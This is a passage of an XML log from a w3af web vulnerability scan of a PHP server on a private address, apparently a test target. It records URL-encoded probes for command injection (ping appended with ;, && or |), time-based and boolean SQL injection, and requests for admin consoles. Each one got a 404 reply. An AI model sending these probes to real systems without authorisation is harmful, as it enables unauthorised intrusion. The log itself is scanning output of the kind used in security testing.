        The article about %3Bping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="873">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+pg_sleep%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+pg_sleep%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="618">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="131">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="647">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="137">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3FBcm1PLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguT21yQXE=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="662">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="757">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24+AND+24%3D25+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24+AND+24%3D25+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24+AND+24%3D25+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="675">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/DsSrs2os HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about DsSrs2os has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='DsSrs2os'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="682">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/xqpud%3C%2F-%3Exqpud%2F%2Axqpud%22xqpudxqpud%27xqpudxqpud%60xqpudxqpud+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about xqpud%3C%2F-%3Exqpud%2F%2Axqpud%22xqpudxqpud%27xqpudxqpud%60xqpudxqpud+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='xqpud%3C%2F-%3Exqpud%2F%2Axqpud%22xqpudxqpud%27xqpudxqpud%60xqpudxqpud+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="683">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%22+OR+%2224%22%3D%2224 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%22+OR+%2224%22%3D%2224 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%22+OR+%2224%22%3D%2224'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="685">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="174">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="690">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%22+AND+%2224%22%3D%2225 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%22+AND+%2224%22%3D%2225 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%22+AND+%2224%22%3D%2225'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="697">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="711">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/QRT5BxM8 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about QRT5BxM8 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='QRT5BxM8'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="712">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/13%22+OR+%2213%22%3D%2213 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 13%22+OR+%2213%22%3D%2213 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='13%22+OR+%2213%22%3D%2213'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="202">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="205">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="720">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/13%22+AND+%2213%22%3D%2214 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 13%22+AND+%2213%22%3D%2214 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='13%22+AND+%2213%22%3D%2214'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="723">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%27+OR+%2724%27%3D%2724 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%27+OR+%2724%27%3D%2724 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%27+OR+%2724%27%3D%2724'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="724">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
